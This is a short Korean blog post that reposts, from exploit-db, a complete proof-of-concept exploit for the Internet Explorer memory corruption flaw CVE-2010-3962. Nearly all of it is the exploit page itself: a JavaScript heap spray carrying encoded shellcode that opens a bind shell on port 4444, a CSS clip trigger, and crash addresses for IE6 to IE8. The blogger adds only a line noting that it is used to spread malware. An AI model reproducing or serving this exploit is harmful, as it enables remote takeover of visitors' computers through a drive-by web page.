Internet Explorer Memory Corruption 0day Vulnerability – CVE-2010-3962, MS10-090

익스플로러 취약점이 또 나왔네요. 악성코드 유포에 이용될 수 있기에 기록해 둡니다.
출처 : http://www.exploit-db.com/exploits/15421/

[code]# Internet Explorer Memory Corruption 0day Vulnerability CVE-2010-3962
# Tested on Windows XP SP3 IE6 IE7 IE8
# Coded by Matteo Memelli ryujin at offsec.com
# http://www.offensive-security.com/0day/ie-0day.txt
# Thx to dookie at offsec.com
# notes    : This is a quick and dirty exploit! No DEP/ASLR bypass here feel free to improve it

<!– Tested on IE6/IE7/IE8 XPSP3 quick and dirty sploit for CVE-2010-3962 zeroday

Note: The EIP value at crash time depends on the exact version of the mshtml library used by IE.
This means that the exploit is not universal for the IE versions indicated in the exploit.

IE6 on XP SP2: mshtml.dll Version 6.0.2900.5512 EIP: 0x0D7DC9C9
IE7 on XP SP3: mshtml.dll Version 7.00.6000.17080 EIP: 0x303CEEBB
IE8 on XP SP3: mshtml.dll Version 8.00.6001.18939 EIP: 0x1D3CF5BD

Matteo Memelli, ryujin at offsec.com thx to dookie at offsec.com //–>
<html>
<head><title>poc CVE-2010-3962 zeroday</title>
<script>
function alloc(bytes, mystr) {
// Bindshell on port 4444
var shellcode = unescape(‘%u9090%u9090%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30%u0c52%u528b’+
‘%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b’+
‘%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34’+
‘%ud601%uff31%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301’+
‘%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a’+
‘%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900%u54c4’+
‘%u6850%u8029%u006b%ud5ff%u5050%u5050%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7%u53db%u0268’+
‘%u1100%u895c%u6ae6%u5610%u6857%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff%u53d5%u5753%u7468’+
‘%u3bec%uffe1%u57d5%uc789%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389%u5757%u3157%u6af6%u5912’+
‘%ue256%u66fd%u44c7%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650%u5656%u5646%u564e%u5356%u6856’+
‘%ucc79%u863f%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd’+
‘%ud5ff%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72%u006a%uff53%u41d5’);
while (mystr.length< bytes) mystr += mystr;
return mystr.substr(0, (bytes-6)/2) + shellcode;
}
</script>
</head>
<body>
<script>
alert(‘ph33r: click me’);
var evil = new Array();
var FAKEOBJ = unescape("%u0d0d%u0d0d");
//FAKEOBJ = alloc(233120, FAKEOBJ); // IE6
//FAKEOBJ = alloc(733120, FAKEOBJ); // IE7
FAKEOBJ = alloc(433120, FAKEOBJ); // IE8
for (var k = 0; k < 1000; k++) {
    evil[k] = FAKEOBJ.substr(0, FAKEOBJ.length);
}
document.write("<table style=position:absolute;clip:rect(0)>");
</script>
 
</body>
</html>
[/code]

이 글 쓰고 확인해보니 이미 악성코드 유포에 이용되고 있었군요.. 🙁

댓글 남기기

이메일은 공개되지 않습니다. 필수 입력창은 * 로 표시되어 있습니다